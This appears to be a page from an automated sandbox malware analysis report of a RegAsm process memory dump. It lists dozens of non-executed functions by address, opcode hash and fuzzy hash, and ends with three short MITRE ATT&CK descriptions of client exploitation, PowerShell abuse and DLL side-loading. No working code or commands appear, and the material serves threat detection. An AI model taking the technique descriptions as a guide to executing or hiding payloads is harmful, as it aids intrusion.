Opcode ID: 86e0fb57c671319db9b690e84c0ef2f46728a81c1a65c1c537e756eca57c0909
Instruction ID: f8e12a1087457859e17f9d24a41aceab6b5bd27d9ae0cd2cc12b032779eedff6
Opcode Fuzzy Hash: 86e0fb57c671319db9b690e84c0ef2f46728a81c1a65c1c537e756eca57c0909
Instruction Fuzzy Hash: AAD0673AB101089FCB049F99E8509DDF7B6FB98661B048126F915A3261C731A925DB50

Function 05EB68B0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2836ccdcd53ddbf726519da61c4cc5f8b35bcac7f30c60600b6e113ed313feb
Instruction ID: 176150210ce27380f3f127e7278e53b1e41c41a4fdb887f3fa1d78923470abb4
Opcode Fuzzy Hash: d2836ccdcd53ddbf726519da61c4cc5f8b35bcac7f30c60600b6e113ed313feb
Instruction Fuzzy Hash: 2CC012301007098BD509F775E84556A3B9EA6C0704B409558A1051954DFFF829455690

Non-executed Functions

Function 05EBCDE0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c1b1cdc4655add5c496da125417960f7fc34e171e55ac543c7fe63b410bf914
Instruction ID: 5c2254371faa12db859b1a315ec3848d20f0c26a932e73b74eb58ede5b9d723a
Opcode Fuzzy Hash: 8c1b1cdc4655add5c496da125417960f7fc34e171e55ac543c7fe63b410bf914
Instruction Fuzzy Hash: F1C1B274E01218CFEB14DFA5C984B9DBBB2BF89300F2091A9D409AB365DB759E85CF50

Function 05EBF1D8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92da63ad82591f8319804288d1f4857c79ca91fd79220e960366d800b1a96ec4
Instruction ID: 36df8802879602e2f031d1f34c402b338cc6a7d7613278897346042dabfdc203
Opcode Fuzzy Hash: 92da63ad82591f8319804288d1f4857c79ca91fd79220e960366d800b1a96ec4
Instruction Fuzzy Hash: A5C1B374E01218CFEB14DFA5C984B9DBBB2BF89300F2091A9D409AB365DB759E85CF10

Function 05EB11A0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0ac1e4edbeeccb477f66993a2aaf33795b0c1ddb1d6dd243382a77dc19d18c0
Instruction ID: 08d1ebd8734417189c8ea2fd0eab615e3eeef66661b7a99f2113762df2e99e52
Opcode Fuzzy Hash: d0ac1e4edbeeccb477f66993a2aaf33795b0c1ddb1d6dd243382a77dc19d18c0
Instruction Fuzzy Hash: 9FC1C174E01218CFEB14DFA5C994B9DBBB2BF89300F1091A9D409AB3A5DB759E85CF10

Function 05EBC988 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b62b4c036a26f1b1cf63804b61f6a499838148bdf3b5d0e75094358f4d36ffb3
Instruction ID: c854af9ad808f225829e7bfdcca9408d18ad92e8032419039680582ba5cc59b8
Opcode Fuzzy Hash: b62b4c036a26f1b1cf63804b61f6a499838148bdf3b5d0e75094358f4d36ffb3
Instruction Fuzzy Hash: 87C1A174E01218CFEB14DFA5C984B9DBBB2BF89300F2091A9D409AB365DB759E85CF50

Function 05EBED80 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3283485a20e22fb41e3eb6a4bce12270315f33d8a3aea277f065f42106d2520f
Instruction ID: 65eece100b4f1f312a247cf0e827a9ac4912c3b480edc4a8b067d91b85fbc5de
Opcode Fuzzy Hash: 3283485a20e22fb41e3eb6a4bce12270315f33d8a3aea277f065f42106d2520f
Instruction Fuzzy Hash: 49C1A074E01218CFEB14DFA5C984B9DBBB2BF89300F2091A9D409AB365DB759E85CF50

Function 05EB0D48 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6f6ed2f9dd83a51390f0537bbe42430ea3c513b8d903e23c1af3e6cdaf6cd69
Instruction ID: 8b2ca55db1dcfdee3898330e2cccf6950e0c7d7066340ef7be6f2ffdc7dcf562
Opcode Fuzzy Hash: a6f6ed2f9dd83a51390f0537bbe42430ea3c513b8d903e23c1af3e6cdaf6cd69
Instruction Fuzzy Hash: 76C1B174E01218CFEB14DFA5C994B9DBBB2BF89300F1091A9D409AB3A5DB759E85CF10

Function 05EBE928 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c18494d7508f38650f954ea39222787f776ec2181e0faa6d2804ea6705544c96
Instruction ID: 6cb16bdceb3e01cedf14e0af7baec6122ad96e15592c2a2184d520f935bd58c2
Opcode Fuzzy Hash: c18494d7508f38650f954ea39222787f776ec2181e0faa6d2804ea6705544c96
Instruction Fuzzy Hash: E2C19F74E01218CFEB14DFA5C994BDDBBB2BF89300F2091A9D409AB365DB759A85CF10

Function 05EBC530 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5160bd2fa1f1c4fb8e28fe921abcfd7e181d6f5376e6b1187d9a8ac3f88cb291
Instruction ID: 74dc9f0d682f5074a988842cf8099727b17cf4fac11ac00e339cc2f52067b7db
Opcode Fuzzy Hash: 5160bd2fa1f1c4fb8e28fe921abcfd7e181d6f5376e6b1187d9a8ac3f88cb291
Instruction Fuzzy Hash: 22C1B274E01218CFEB14DFA5C944B9DBBB2BF89300F2091A9D409AB365DB755E85CF50

Function 05EB08F0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 328d6106bc21ac9792501a0000ac5d2d5dcba14e4b75afad2160fa111b120453
Instruction ID: acc392d23a7e542c5a34b0b876d3d069f936fcf23849d36fc2755e78094cadb1
Opcode Fuzzy Hash: 328d6106bc21ac9792501a0000ac5d2d5dcba14e4b75afad2160fa111b120453
Instruction Fuzzy Hash: 8CC1B374E01218CFEB14DFA5C984B9DBBB2BF89304F2091A9D409AB365DB759E85CF10

Function 05EBC0D8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 414f282f2d6ea5153ec7305304d490b84ae52a7ba6e699a199d7e1c19649a11f
Instruction ID: 4ddbf974a6a366c65e56fbe5b6e9fa52b98c0c2a9c82eca3cdbc9b016708c969
Opcode Fuzzy Hash: 414f282f2d6ea5153ec7305304d490b84ae52a7ba6e699a199d7e1c19649a11f
Instruction Fuzzy Hash: C1C1B374E01218CFEB14DFA5C944B9DBBB2BF89300F6091A9D409AB365DB755E85CF10

Function 05EBE4D0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55c5e901ea7bdba399129b44dded4e566137ac76d22b3e6fcda4dbd070066a12
Instruction ID: ca21a7ac2e2fd9afc695bcd950761c69002dca5bd996980047c121d949f603d2
Opcode Fuzzy Hash: 55c5e901ea7bdba399129b44dded4e566137ac76d22b3e6fcda4dbd070066a12
Instruction Fuzzy Hash: CFC1AF74E01218CFEB14DFA5C984BDDBBB2BF89300F1091A9D409AB3A5DB759A85CF50

Function 05EB40A8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22df5931daf8366556f05ee62736aeb924147d9f920108a93cd04759a6c55942
Instruction ID: 1e6e8a05e49c29ef1ff79670ebd7a40a51b2b3860d018b32cada88d1e69eb55d
Opcode Fuzzy Hash: 22df5931daf8366556f05ee62736aeb924147d9f920108a93cd04759a6c55942
Instruction Fuzzy Hash: C5C1B174E01218CFEB14DFA5C984B9DBBB2BF89300F1091A9D409AB3A5DB759E85DF10

Function 05EBBC80 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94ab18f0fa094fdbbd9f97942d00abc1ba4c254e1db66ed7eb510872c77ed1af
Instruction ID: 8329a69be348823c835610fe77196eb7f3b5fe668e1f039b270a47563e34c5d9
Opcode Fuzzy Hash: 94ab18f0fa094fdbbd9f97942d00abc1ba4c254e1db66ed7eb510872c77ed1af
Instruction Fuzzy Hash: D1C1B274E01218CFEB14DFA5C944B9DBBB2BF89300F2091A9D409AB365DB759E85CF50

Function 05EB0498 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3735d6e49f46c4babf2a0ef3133eedb80028203237935a5f8679c3b83fa9447a
Instruction ID: aee275db1544afa8fa801f3a4b39ef881763b50d07dd8cf257d08c35aab5b055
Opcode Fuzzy Hash: 3735d6e49f46c4babf2a0ef3133eedb80028203237935a5f8679c3b83fa9447a
Instruction Fuzzy Hash: CAC1C274E01218CFEB14DFA5C984B9EBBB2BF89300F1091A9D409AB365DB759E85CF50

Function 05EBE078 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9aceb548e32f40e411f6314d50f7a8a219c31b28912b34650614151b0be5352c
Instruction ID: 6863263b80651c73e231e5baab48218c4e9e437162bf0cb3faebbfd968dff0e5
Opcode Fuzzy Hash: 9aceb548e32f40e411f6314d50f7a8a219c31b28912b34650614151b0be5352c
Instruction Fuzzy Hash: F1C19F74E01218CFEB14DFA5C984BDDBBB2BF89300F2091A9D409AB365DB759A85CF50

Function 05EB0040 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 460142d2f88bcad1810ef4be31c5af32feb55dc2a3bb51c28c0e22adaefd65d2
Instruction ID: 1bc2430256718e0736063f9ae922934df93040a8428654db8d9a16b158e28273
Opcode Fuzzy Hash: 460142d2f88bcad1810ef4be31c5af32feb55dc2a3bb51c28c0e22adaefd65d2
Instruction Fuzzy Hash: B3C1B274E01218CFEB14DFA5C944B9EBBB2BF89300F1091A9D409AB365DB759E85DF10

Function 05EB3C50 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32b7e38c623b1d7926665f6c35f2a383fc02ed107d71037bf446e11e6008c40e
Instruction ID: 2fc95a9fad12fe3ca8065ceb25a7ea4f2a85603f092553492c982cb26bed2cbf
Opcode Fuzzy Hash: 32b7e38c623b1d7926665f6c35f2a383fc02ed107d71037bf446e11e6008c40e
Instruction Fuzzy Hash: B6C1B374E01218CFEB14DFA5C994B9DBBB2BF89300F1091A9D409AB3A5DB759E85CF10

Function 05EBB828 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9558f5dac9342dba66c22d0978e37d3c420b75639ed3f5b2fcb2e8eba1e4bfb
Instruction ID: 65c1596ed619b57ab721deb151f7fa2549824b715e11444eb3d680889338a93d
Opcode Fuzzy Hash: a9558f5dac9342dba66c22d0978e37d3c420b75639ed3f5b2fcb2e8eba1e4bfb
Instruction Fuzzy Hash: C7C1A174E01218CFEB14DFA5C994B9EBBB2BF89300F1091A9D409AB365DB759E85CF10

Function 05EBDC20 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43bd6c91899d68c2b37907fdd6886b70e3dba285738746f007e17de9e0e9f640
Instruction ID: 0d670275068951efc0ce5103d81608c11a89ef8e74ba842d52eed163cf980f24
Opcode Fuzzy Hash: 43bd6c91899d68c2b37907fdd6886b70e3dba285738746f007e17de9e0e9f640
Instruction Fuzzy Hash: D0C1B074E01218CFEB14DFA5C984B9DBBB2BF89300F1091A9D409AB3A5DB759E85CF10

Function 05EB37F8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66ff3859a6021f6e5f2e1b3c13571c15adbc6d055fbc49a77341fac177178ccd
Instruction ID: 6a6b8476b99e38fdf6a50036abe43df242c116a92c82538ac5bcbbf52941fdaa
Opcode Fuzzy Hash: 66ff3859a6021f6e5f2e1b3c13571c15adbc6d055fbc49a77341fac177178ccd
Instruction Fuzzy Hash: 3EC1C174E00218CFEB14DFA5C985B9DBBB2BF88300F2095A9D409AB365DB759E85CF10

Function 05EBB3D0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beb137ee06ef4cd489ee4f7c0c812784b666be4729867103757416f56f79e1a7
Instruction ID: dad4e7aa4f37eb2d1d2010c74e43ab1c3c3c3f959eb09c935da5c1c09d6f1d15
Opcode Fuzzy Hash: beb137ee06ef4cd489ee4f7c0c812784b666be4729867103757416f56f79e1a7
Instruction Fuzzy Hash: 4CC1B174E01218CFEB14DFA5C984B9DBBB2BF89300F2091A9D409AB365DB759E85CF50

Function 05EB33A0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4454f3802bf5e290fc77b6d2446b5aa6264418c5ef6a8b43138787eb0531b44b
Instruction ID: bfb1d1a769cf9b1483a5598435f869ff14a10762bbecad27c0571bee82944980
Opcode Fuzzy Hash: 4454f3802bf5e290fc77b6d2446b5aa6264418c5ef6a8b43138787eb0531b44b
Instruction Fuzzy Hash: 58C1C474E01218CFEB14DFA5C944B9DBBB2BF89300F1091A9D409AB355DB759E85CF10

Function 05EBAF78 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac1d595a0b755aceb695a24db61ce1bc1d024fad95c66be11a6159d6fbbccf7e
Instruction ID: 365cf8c1733cdaa2ab4468487c658fed3f0995a6e15603a2e19e50dfbdb4aa39
Opcode Fuzzy Hash: ac1d595a0b755aceb695a24db61ce1bc1d024fad95c66be11a6159d6fbbccf7e
Instruction Fuzzy Hash: 9EC1B174E01218CFEB14DFA5C984B9DBBB2BF89300F2091A9D409AB365DB759E85CF10

Function 05EB2F48 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cd5eedb58899ebb93c747213adba6ef63282fb834ca711035bc8edfa65095df
Instruction ID: 10bab1ee4d62129e21bae9a908cfc0276303004f9ae332f86d5c52e4d4383887
Opcode Fuzzy Hash: 3cd5eedb58899ebb93c747213adba6ef63282fb834ca711035bc8edfa65095df
Instruction Fuzzy Hash: 9EC1C274E01218CFEB14DFA5C984B9EBBB2BF89300F1095A9D409AB365DB759E85CF10

Function 05EBAB20 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cdffc8b4d52f1f045450dac0805b8b7682cbee2f2be5b834aeb7c70599c0cbc
Instruction ID: bec730a34a90049c588e9ab8e239d7e54b6e45af5693000324eba4a19651feec
Opcode Fuzzy Hash: 4cdffc8b4d52f1f045450dac0805b8b7682cbee2f2be5b834aeb7c70599c0cbc
Instruction Fuzzy Hash: 84C1A074E01218CFEB14DFA5C984B9DBBB2BF89300F1091A9D409AB365DB759E85CF50

Function 05EB2AF0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 385c530a3088b8845b3097dc3481fbde7c10628b1861c74680d58dc93c6ca06f
Instruction ID: bc2e6119fad245524e00226dbc8703b331c4f1ea4bbf32e965c62482bf4abd7d
Opcode Fuzzy Hash: 385c530a3088b8845b3097dc3481fbde7c10628b1861c74680d58dc93c6ca06f
Instruction Fuzzy Hash: D0C1B174E01218CFEB14DFA5C984B9DBBB2BF89300F2091A9D409AB365DB759E85DF10

Function 05EBA6C8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 199d34f04a00c1d5779c35f9f12f5db0be3f56c7c7f4b528071f48e7899704df
Instruction ID: 6d141848b4ea5d6e6fd28c7605ab486397528e93ad495d2356abbb7d4148e58f
Opcode Fuzzy Hash: 199d34f04a00c1d5779c35f9f12f5db0be3f56c7c7f4b528071f48e7899704df
Instruction Fuzzy Hash: A1C1A174E01218CFEB14DFA5C984B9DBBB2BF89300F1091A9D409AB365DB759E85DF10

Function 05EBFA88 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17f194c67ca3f83b70c6a9a48f11a877be913b8494ccc4fa5d505abd7ac0b72b
Instruction ID: c0c22af1d99204a45eb1e7c9c0c811190df2d624481fb7f05c95d4c3621304fb
Opcode Fuzzy Hash: 17f194c67ca3f83b70c6a9a48f11a877be913b8494ccc4fa5d505abd7ac0b72b
Instruction Fuzzy Hash: 80C1B174E01218CFEB14DFA5C984B9DBBB2BF89300F2091A9D409AB365DB759E85CF50

Function 05EBD690 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62d9e285ba4426c4bb743c76eb9a654f77b78988fc21f273beb38562be979ee6
Instruction ID: 846ab62edf08bdbf3f1eeb1071dbe0fa261d0048c1783c2407122e1e97dd4218
Opcode Fuzzy Hash: 62d9e285ba4426c4bb743c76eb9a654f77b78988fc21f273beb38562be979ee6
Instruction Fuzzy Hash: 71C1A174E01218CFEB14EFA5C984B9DBBB2BF89300F1091A9D409AB365DB759E85CF50

Function 05EBA270 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4f51f2c77a5184bf9375e05aa6ea32a106e980cfd8329ebbf0a89ffbfbca6e3
Instruction ID: 654b6bca3c418987588f0b5b88e190e311796581842315cac08bca8b9d251a5b
Opcode Fuzzy Hash: b4f51f2c77a5184bf9375e05aa6ea32a106e980cfd8329ebbf0a89ffbfbca6e3
Instruction Fuzzy Hash: C6C1A074E01218CFEB14DFA5C984B9DBBB2BF89300F2091A9D409AB365DB759E85CF10

Function 05EBD238 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e47a31191b896636a3f6778e256a55f4177a4bb3163c1fa8132e609fe033da0a
Instruction ID: d9f113f5f0faeda49267dba4cf8681a588e16da9f3a5cd3464f198eebac1676c
Opcode Fuzzy Hash: e47a31191b896636a3f6778e256a55f4177a4bb3163c1fa8132e609fe033da0a
Instruction Fuzzy Hash: A1C1A074E01218CFEB14DFA5C984B9DBBB2BF89300F1091A9D409AB3A5DB759E85CF10

Function 05EBF630 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2637927e264cb091366a7a954fbc6ceaa57625aae45c9f45107b59ef460b823b
Instruction ID: 19e0b3ca9c08e08907af74c726627f924b846b1d691b7a4f04714590b643cd3a
Opcode Fuzzy Hash: 2637927e264cb091366a7a954fbc6ceaa57625aae45c9f45107b59ef460b823b
Instruction Fuzzy Hash: EFC1A174E01218CFEB14DFA5C984B9DBBB2BF89300F1091A9D409AB365DB759E85CF50

Function 05EB9E18 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebc51efc0802af7bca8bf6ef8a911082f10f5a194227ca92e32d6cb128ebd561
Instruction ID: 2e0522ce2b6a4227c7a682ad06d33e50f75e956eca8402a7f85f7387882f4992
Opcode Fuzzy Hash: ebc51efc0802af7bca8bf6ef8a911082f10f5a194227ca92e32d6cb128ebd561
Instruction Fuzzy Hash: 89C1B174E01218CFEB14DFA5C994B9EBBB2BF89300F1091A9D409AB365DB759E85CF10

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

